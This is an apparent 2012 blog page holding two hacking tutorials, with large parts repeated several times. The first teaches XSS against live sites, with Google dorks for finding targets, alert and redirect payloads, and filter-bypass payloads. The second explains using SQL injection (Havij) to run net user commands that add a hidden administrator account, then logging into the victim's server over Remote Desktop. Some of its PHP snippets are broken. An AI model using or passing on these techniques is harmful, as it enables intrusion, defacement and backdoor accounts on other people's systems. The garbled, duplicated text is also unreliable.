Friday, October 5, 2012
XSS Master Guide FOR ALL XPERTS and NOOBS
This is a detailed guide to everything XSS.
What is XSS?
XSS stands for Cross Site Scripting. Sometimes it is called CSS however that is often confused with Cascading Style Sheets so XSS is the preferred term.
Cross Site Scripting is a means to take advantage of web applications that take user input but aren't filtered properly. This allows an attacker to inject HTML or other codes such as Javascript into the server to manipulate it in some way.
Different kinds of XSS
There are 3 traditional types of XSS attacks, however if you are inventive and understand all the workings behind XSS and the server then their are nearly limitless potentials.
1. DOM-Based Attack
A DOM-Based attack is a more advanced attack where the attackers payload (malicious script) is executed as a result of modifying the DOM Environment in the slave's browser by the original client side script, this causes the client side code to run in an unexpected manner.
2. Persistent XSS Attack
A persistent XSS attack is a method in which the attackers payload is permanent to the servers code and will remain there for every user to see until a server admin removes it.
3. Non-Persistent XSS Attack
A non-persistent XSS attack is a method in which the attackers payload is not permanent, meaning it doesn't effect the servers internal code. An example of this would be a link that has a Non-Persistent attack embedded into it.
How do we find a vulnerable server?
To find a server in which to do an XSS attack there are two main methods. You can use a Google search dork in which we google for common exploitations in servers. The other method is to read the actual .php code of the website (I will get into this later).
Here are some good examples of google dorks for an XSS attack.
To do this simply google one of these things and it will spit out a list of results that will be XSS vulnerable if proper filtration wasn't taken place.
Testing XSS vulnerable
To test whether or not the site you have found is vulnerable we need to attempt to inject some code into its server.
You can inject code in multiple ways. If there is a search bar you may inject the code right into there. You can inject the code into the url, for example, "http://www.slave.net/newthread.php?fid=CODE GOES HERE". Or if you are attacking a forum you can try to inject the code into the body of a thread, this will execute the script when someone opens the thread.
Here is the base test that I use to test for vulnerabilities. Insert it into the website you are attacking.
If the webpage is vulnerable you should get a sort of "Pop-up" that says "Test". If you didn't get anything do not worry, that just means the server admin has placed filters to counter XSS attacks. I will get into bypassing these filters near the end.
Assuming you have found a XSS vulnerable site you can now attack it.
For eg. if you input the following above string, everyone will get an alert when they view the page saying "Hi! Abh ROCKS!"
You can also use a redirect script to redirect the viewer to your deface page, making the page appear defaced.
One of the main reasons to XSS attack is to steal cookies. However i will not get into that in this tutorial because it involves setting up your own server in which to host your cookie stealer php script so you can inject it into the victims server. If you would like me to do a tutorial on that feel free to leave a comment and I may get around to it.
Vulnerabilities by examining php code
Because I have never seen a tutorial on this kind of XSS attacking I figured I would share it as well. We can read the php code to find other unfiltered variables to exploit or to diagnose what kind of filtration is being used on a specific variable so we may bypass it.
If we look at the Hackforums newthread.php url for example it shows "newthread.php?fid=" the world that comes after the "?" and before the "=" is the variable that is being modified. And just because that is the only variable it shows doesn't mean its the only variable that we can alter.
I will be talking about diagnosing and bypassing 3 main types of filtration, after that you will have to take what you have learned and apply it to other filter systems.
-str_replace() filter
-htmlentities()
-Bypassing filters using data URIs
Lets imagine we have an imaginary page http://localhost/page.php?name=John . The php code for this page looks like this.
In this page there is no filtration system present and we can easily attack the "name" variable.
This would be our result attack:
http://localhost/page.php?name=<script>alert('XSS')</script>
Bypass a basic str_replace() filter
Now imagine we are at the same page but the code has changed and now has a basic str_replace() filter in place on the variable of name. The php code fir this page is as follows.
What this filter does is replace ever instance of "script" with null in "name". To bypass this we can simply add some capital letters to the word script in our attack.
Result attack:
http://localhost/page.php?name=<ScrIpt>alert('XSS')</ScriPt>
and voila we have successively bypassed the filter and injected our code.
Bypassing a htmlentities() filter
A lot of websites are using htmlentities() function against XSS but it's only efficient against double quotes.
What html entities does is it converts the HTML string into HTML entities. This converts all "<" to "<" and ">" to ">" meaning the resulted text wont be handled as a script. However we can easily bypass by writing our script without the use of < > or ".
The php code for this is.
To inject our code and bypass this filter we need to simply avoid the use of '<' and '>' or " and make use of HTML events.
The resulted attack is:
http://localhost/page.php?img= .' onerror='alert("XSS")
Bypass XSS filters using data URIs
This is not a very well known vulnerability however you can bypass almost any filter with it. data URI's are generally used for images to keep them as text in a HTML document. I noticed that sometimes you can use it to bypass XSS filter htmlspecialchars(). The vulnerable page is designed to show a URI image from the following URL.
http://localhost/page.php?img=data:i...EAAAICRAEAOw==
The php code is.
By modifying the data type from an image/gif to a text/html and the data content it's possible to exploit XSS.
Result attack:
http://localhost/page.php?img=data:t...k8L3NjcmlwdD4=
I hope you enjoyed the tutorial, if anyone has any questions feel free to ask. I apologize if i got any information incorrect i'm still new at this.
Please comment and keep alive :)
What is XSS?
XSS stands for Cross Site Scripting. Sometimes it is called CSS however that is often confused with Cascading Style Sheets so XSS is the preferred term.
Cross Site Scripting is a means to take advantage of web applications that take user input but aren't filtered properly. This allows an attacker to inject HTML or other codes such as Javascript into the server to manipulate it in some way.
Different kinds of XSS
There are 3 traditional types of XSS attacks, however if you are inventive and understand all the workings behind XSS and the server then their are nearly limitless potentials.
1. DOM-Based Attack
A DOM-Based attack is a more advanced attack where the attackers payload (malicious script) is executed as a result of modifying the DOM Environment in the slave's browser by the original client side script, this causes the client side code to run in an unexpected manner.
2. Persistent XSS Attack
A persistent XSS attack is a method in which the attackers payload is permanent to the servers code and will remain there for every user to see until a server admin removes it.
3. Non-Persistent XSS Attack
A non-persistent XSS attack is a method in which the attackers payload is not permanent, meaning it doesn't effect the servers internal code. An example of this would be a link that has a Non-Persistent attack embedded into it.
How do we find a vulnerable server?
To find a server in which to do an XSS attack there are two main methods. You can use a Google search dork in which we google for common exploitations in servers. The other method is to read the actual .php code of the website (I will get into this later).
Here are some good examples of google dorks for an XSS attack.
Code:
inurl:com_feedpostold/feedpost.php?url=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=Search&k=
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:pages/match_report.php?mid= pages/match_report.php?mid=
inurl:/notice.php?msg= /notice.php?msg=
inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
inurl:/index.php?option=com_easygb&Itemid=
inurl:/2wayvideochat/index.php?r=
inurl:/view.php?PID= /view.php?PID=
inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
inurl:/showproperty.php?id= /showproperty.php?id=
inurl:/vehicle/buy_do_search/?order_direction=
inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
inurl:/winners.php?year=2008&type= /winners.php?
inurl:/schoolmv2/html/studentmain.php?*******=
inurl:/site_search.php?sfunction= /site_search.php?sfunction=
inurl:/search.php?search_keywords= /search.php?search_keywords=
inurl:/hexjector.php?site= /hexjector.php?site=
inurl:/news.php?id= /news.php?id=
inurl:/index.php?view=help&faq=1&ref=
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
inurl:/index.php?
inurl:/info.asp?
Testing XSS vulnerable
To test whether or not the site you have found is vulnerable we need to attempt to inject some code into its server.
You can inject code in multiple ways. If there is a search bar you may inject the code right into there. You can inject the code into the url, for example, "http://www.slave.net/newthread.php?fid=CODE GOES HERE". Or if you are attacking a forum you can try to inject the code into the body of a thread, this will execute the script when someone opens the thread.
Here is the base test that I use to test for vulnerabilities. Insert it into the website you are attacking.
Code:
<script>alert("test")</script>Assuming you have found a XSS vulnerable site you can now attack it.
For eg. if you input the following above string, everyone will get an alert when they view the page saying "Hi! Abh ROCKS!"
Code:
<script>alert("Hi! Abh ROCKS!")</script>Code:
<script>window.location = "http://users11.jabry.com/"</script>
Vulnerabilities by examining php code
Because I have never seen a tutorial on this kind of XSS attacking I figured I would share it as well. We can read the php code to find other unfiltered variables to exploit or to diagnose what kind of filtration is being used on a specific variable so we may bypass it.
If we look at the Hackforums newthread.php url for example it shows "newthread.php?fid=" the world that comes after the "?" and before the "=" is the variable that is being modified. And just because that is the only variable it shows doesn't mean its the only variable that we can alter.
I will be talking about diagnosing and bypassing 3 main types of filtration, after that you will have to take what you have learned and apply it to other filter systems.
-str_replace() filter
-htmlentities()
-Bypassing filters using data URIs
Lets imagine we have an imaginary page http://localhost/page.php?name=John . The php code for this page looks like this.
PHP Code:
<?php
echo 'Your name is '.$_GET['name'];?> This would be our result attack:
http://localhost/page.php?name=<script>alert('XSS')</script>
Bypass a basic str_replace() filter
Now imagine we are at the same page but the code has changed and now has a basic str_replace() filter in place on the variable of name. The php code fir this page is as follows.
PHP Code:
<?php
echo 'Your name is '.str_replace('script', null, .$_GET['name']);?> Result attack:
http://localhost/page.php?name=<ScrIpt>alert('XSS')</ScriPt>
and voila we have successively bypassed the filter and injected our code.
Bypassing a htmlentities() filter
A lot of websites are using htmlentities() function against XSS but it's only efficient against double quotes.
What html entities does is it converts the HTML string into HTML entities. This converts all "<" to "<" and ">" to ">" meaning the resulted text wont be handled as a script. However we can easily bypass by writing our script without the use of < > or ".
The php code for this is.
PHP Code:
<?php
echo "<img alt='' src='".htmlentities($_GET['img'])."' />";?> The resulted attack is:
http://localhost/page.php?img= .' onerror='alert("XSS")
Bypass XSS filters using data URIs
This is not a very well known vulnerability however you can bypass almost any filter with it. data URI's are generally used for images to keep them as text in a HTML document. I noticed that sometimes you can use it to bypass XSS filter htmlspecialchars(). The vulnerable page is designed to show a URI image from the following URL.
http://localhost/page.php?img=data:i...EAAAICRAEAOw==
The php code is.
PHP Code:
<?php
echo '<object data="'.htmlspecialcharacters($_get['img'])/"' />";?> Result attack:
http://localhost/page.php?img=data:t...k8L3NjcmlwdD4=
I hope you enjoyed the tutorial, if anyone has any questions feel free to ask. I apologize if i got any information incorrect i'm still new at this.
Please comment and keep alive :)
Tutorial Get RDP With Havij and With Shell Hosted Windows
Hi guy's. I created this simple tutor \ wkwkwkwk ..
OK, not only we control the web with Shell either b374k or lotus, or whatever name shellnya, we can also use the default Windows feature Remote Desktop, it's just that we still need to know the username and password for access to the server forced.dan we do technique Sql Injection and the username and password the victim is not necessarily the same to login to computer, LHA should continue to do?? we can use Havij for itu.materials are:
Dork.saya use Dork inurl :/ *. Asp? Id =
Havij
internet connection
patience to look for victims
Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"
Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"
if you've done we select the "net localgroup administrators (login name preference) / add" and again click "execute"
The first task, then we open the windows of his facility, which is a remote desktop, how to start-all-accessories-remote program on the desktop, and then we put our target ip and click connect, wait a moment until a connection is made ..
then enter the username and password that we've created earlier ..
and tadaaa .. we got into the victim server
Here Using Comand Shell hosted in Windows
1. Make sure you can access the web administrator, how:
code:
if you access the administrator it will show an example of this kind
code:
User accounts for \ \
Adding users, here I use the user name bery
code:
Changing user with Administrator access bery
code:
We create a password
code:
Okay, then you open the Remote Desktop Connection that is in your windows, well because I'm using Windows XP it was located in
code:
all done
OK, not only we control the web with Shell either b374k or lotus, or whatever name shellnya, we can also use the default Windows feature Remote Desktop, it's just that we still need to know the username and password for access to the server forced.dan we do technique Sql Injection and the username and password the victim is not necessarily the same to login to computer, LHA should continue to do?? we can use Havij for itu.materials are:
Dork.saya use Dork inurl :/ *. Asp? Id =
Havij
internet connection
patience to look for victims
Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"
Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"
if you've done we select the "net localgroup administrators (login name preference) / add" and again click "execute"
The first task, then we open the windows of his facility, which is a remote desktop, how to start-all-accessories-remote program on the desktop, and then we put our target ip and click connect, wait a moment until a connection is made ..
then enter the username and password that we've created earlier ..
and tadaaa .. we got into the victim server
Here Using Comand Shell hosted in Windows
1. Make sure you can access the web administrator, how:
code:
Quote:
| net user |
code:
User accounts for \ \
Quote:
| -------------------------------------------------- ----------------------------- administrator Support_388945a0 tom1983 The command completed with one or more errors. |
code:
Quote:
| bery net user / add |
code:
Quote:
| bery net localgroup administrators / add |
code:
Quote:
| net user bery 1234 |
Okay, then you open the Remote Desktop Connection that is in your windows, well because I'm using Windows XP it was located in
code:
Quote:
| Start - All Programs - Accessories - Remote Desktop Connection |
Tutorial Get RDP With Havij and With Shell Hosted Windows
Hi guy's. I created this simple tutor \ wkwkwkwk ..
OK, not only we control the web with Shell either b374k or lotus, or whatever name shellnya, we can also use the default Windows feature Remote Desktop, it's just that we still need to know the username and password for access to the server forced.dan we do technique Sql Injection and the username and password the victim is not necessarily the same to login to computer, LHA should continue to do?? we can use Havij for itu.materials are:
Dork.saya use Dork inurl :/ *. Asp? Id =
Havij
internet connection
patience to look for victims
Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"
Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"
if you've done we select the "net localgroup administrators (login name preference) / add" and again click "execute"
The first task, then we open the windows of his facility, which is a remote desktop, how to start-all-accessories-remote program on the desktop, and then we put our target ip and click connect, wait a moment until a connection is made ..
then enter the username and password that we've created earlier ..
and tadaaa .. we got into the victim server
Here Using Comand Shell hosted in Windows
1. Make sure you can access the web administrator, how:
code:
if you access the administrator it will show an example of this kind
code:
User accounts for \ \
Adding users, here I use the user name bery
code:
Changing user with Administrator access bery
code:
We create a password
code:
Okay, then you open the Remote Desktop Connection that is in your windows, well because I'm using Windows XP it was located in
code:
all done
OK, not only we control the web with Shell either b374k or lotus, or whatever name shellnya, we can also use the default Windows feature Remote Desktop, it's just that we still need to know the username and password for access to the server forced.dan we do technique Sql Injection and the username and password the victim is not necessarily the same to login to computer, LHA should continue to do?? we can use Havij for itu.materials are:
Dork.saya use Dork inurl :/ *. Asp? Id =
Havij
internet connection
patience to look for victims
Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"
Ok, I assume all peers are dapet victims and use Havij dah scanned, then we select the CMD icon at Havij and in that column we select the "net user (name of favorite login) (password) / add" and we click "execute"
if you've done we select the "net localgroup administrators (login name preference) / add" and again click "execute"
The first task, then we open the windows of his facility, which is a remote desktop, how to start-all-accessories-remote program on the desktop, and then we put our target ip and click connect, wait a moment until a connection is made ..
then enter the username and password that we've created earlier ..
and tadaaa .. we got into the victim server
Here Using Comand Shell hosted in Windows
1. Make sure you can access the web administrator, how:
code:
Quote:
| net user |
code:
User accounts for \ \
Quote:
| -------------------------------------------------- ----------------------------- administrator Support_388945a0 tom1983 The command completed with one or more errors. |
code:
Quote:
| bery net user / add |
code:
Quote:
| bery net localgroup administrators / add |
code:
Quote:
| net user bery 1234 |
Okay, then you open the Remote Desktop Connection that is in your windows, well because I'm using Windows XP it was located in
code:
Quote:
| Start - All Programs - Accessories - Remote Desktop Connection |